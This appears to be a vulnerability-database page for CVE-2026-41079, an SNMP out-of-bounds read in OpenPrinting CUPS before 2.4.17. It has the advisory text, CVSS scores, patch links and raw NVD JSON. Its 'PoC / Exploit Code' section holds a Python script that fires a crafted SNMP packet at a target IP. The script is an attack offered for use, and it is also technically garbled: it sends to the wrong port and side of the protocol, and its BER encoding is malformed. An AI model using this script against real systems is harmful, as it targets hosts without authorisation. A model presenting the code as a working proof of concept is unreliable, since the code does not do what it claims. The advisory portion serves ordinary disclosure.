Security Vulnerability Report
CVE-2026-41079 CVSS 4.3 MEDIUM

CVE-2026-41079

Published: 2026-04-24 17:16:21
Last Modified: 2026-04-27 13:40:55

Description

OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. Prior to 2.4.17, a network-adjacent attacker can send a crafted SNMP response to the CUPS SNMP backend that causes an out-of-bounds read of up to 176 bytes past a stack buffer. The leaked memory is converted from UTF-16 to UTF-8 and stored as printer supply description strings, which are subsequently visible to authenticated users via IPP Get-Printer-Attributes responses and the CUPS web interface. This vulnerability is fixed in 2.4.17.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:openprinting:cups:*:*:*:*:*:*:*:* - VULNERABLE
OpenPrinting CUPS < 2.4.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-41079: CUPS SNMP Out-of-Bounds Read
# This script demonstrates sending a crafted SNMP response to trigger the vulnerability.
import socket
import struct


def send_malicious_snmp(target_ip):
    # SNMP UDP port
    port = 161

    # Construct a simplified SNMP response packet structure
    # This payload is designed to trigger the overflow in the CUPS SNMP backend.
    # Note: Actual exploitation requires precise ASN.1 encoding specific to the CUPS implementation.

    # Community string 'public'
    community = b'public'

    # A crafted payload that exceeds the expected buffer size to trigger OOB read
    # The vulnerability allows reading up to 176 bytes past the buffer.
    # We construct a long string to simulate the overflow condition.
    overflow_payload = b'A' * 200

    # Basic SNMP Packet Structure (Type, Length, Value)
    # This is a conceptual representation. Real packets require proper ASN.1 BER encoding.
    snmp_packet = b'\x30' + struct.pack('>B', len(community) + len(overflow_payload) + 4)  # Sequence
    snmp_packet += b'\x02\x01\x01'  # Version (v2c)
    snmp_packet += b'\x04' + struct.pack('>B', len(community)) + community  # Community
    snmp_packet += b'\xa2' + struct.pack('>B', len(overflow_payload)) + overflow_payload  # PDU GetResponse

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(snmp_packet, (target_ip, port))
        print(f"[+] Malicious SNMP packet sent to {target_ip}")
        print("[+] Check the CUPS Web Interface for memory leaks in printer attributes.")
        sock.close()
    except Exception as e:
        print(f"[-] Error sending packet: {e}")


if __name__ == "__main__":
    # Replace with the target CUPS server IP
    target = "192.168.1.100"
    send_malicious_snmp(target)
```

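References

https://github.com/OpenPrinting/cups/commit/b7c2525a885f528d243c3a92197ca99609b3f080 (Patch)
https://github.com/OpenPrinting/cups/commit/d7fe0f521ff3b24676511e747b058362b9a20737 (Patch)
https://github.com/OpenPrinting/cups/security/advisories/GHSA-6wpw-g8g6-wvrv (Exploit, Mitigation, Patch, Vendor Advisory)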

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41079", "sourceIdentifier": "[email protected]", "published": "2026-04-24T17:16:21.340", "lastModified": "2026-04-27T13:40:54.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. Prior to 2.4.17, a network-adjacent attacker can send a crafted SNMP response to the CUPS SNMP backend that causes an out-of-bounds read of up to 176 bytes past a stack buffer. The leaked memory is converted from UTF-16 to UTF-8 and stored as printer supply description strings, which are subsequently visible to authenticated users via IPP Get-Printer-Attributes responses and the CUPS web interface. This vulnerability is fixed in 2.4.17."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:a:openprinting:cups:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.17", "matchCriteriaId": "7CC76E8F-8DC0-4A44-A6EB-2C2C6CF289AC"}]}]}], "references": [{"url": "https://github.com/OpenPrinting/cups/commit/b7c2525a885f528d243c3a92197ca99609b3f080", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OpenPrinting/cups/commit/d7fe0f521ff3b24676511e747b058362b9a20737", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-6wpw-g8g6-wvrv", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-6wpw-g8g6-wvrv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}]}}